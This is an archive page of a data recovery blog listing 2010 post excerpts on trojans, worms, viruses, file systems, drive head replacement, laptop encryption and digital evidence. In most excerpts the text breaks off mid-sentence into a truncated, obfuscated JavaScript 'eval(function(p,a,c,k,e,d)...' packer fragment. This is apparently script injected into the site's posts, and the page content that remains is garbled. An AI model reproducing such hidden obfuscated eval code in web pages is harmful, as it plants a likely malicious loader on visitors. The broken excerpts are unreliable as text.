Archive for: 2010

Prevent Trojan Horse and protect your data

Prevent Trojan Horse and protect your data

Trojan eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...

 

Worm handling to avert data loss

Worms can spread by internet so rapidly that they may often go undetected by anti-virus software because the updates that would enable the software to detect the worm have not yet been developed or downloaded. Because of this, it’s advisable...

 

exFAT conversion issue and exFAT vs FAT32 vs NTFS

exFAT conversion issue and exFAT vs FAT32 vs NTFS

The Extended FAT File System (exFAT) eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...

 

Cyber security-Virus handling to avert data loss

Cyber security-Virus handling to avert data loss

Virus attack is one very common threat to our data security and there are many ways of beging attacked or infected and there are also many ways to avoid it and clear it. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...

 

Head replacement and platter swap demo

Head replacement and platter swap demo

The following is one typical handling process of head replacement and platter swap. Here in my data recovery clean room, I use one of the HDD repair suite-HD HPE PRO. HDD eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...

 

Laptop encryption overview

Laptop encryption overview

There are a number of specific types of laptop eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...

 

High success rate cheap data recovery in Norwich UK

High success rate cheap data recovery in Norwich UK

We have ever here on Data Recovery Salon published one article called ‘How eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...

 

Data recovery software for CD/DVD/Blu-ray discs

Data recovery software for CD/DVD/Blu-ray discs

Recover Disc helps you extract data from damaged or incorrectly burned CD,  DVD  and Blu-ray discs when regular software can’t read them fully or partially. This tool extracts the intact portion of your data and tries to restore problem...

 

Wireless Telephones Potential Evidence

Wireless Telephones Potential Evidence

Electronic devices may contain viable evidence associated with criminal activity. Unless an emergency exists, the device should not be accessed. Should it be necessary to access the device, all actions associated with the manipulation of the...

 

How to recognize digital evidence

How to recognize digital evidence

An interesting snippet from the United States Secret Service on how eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...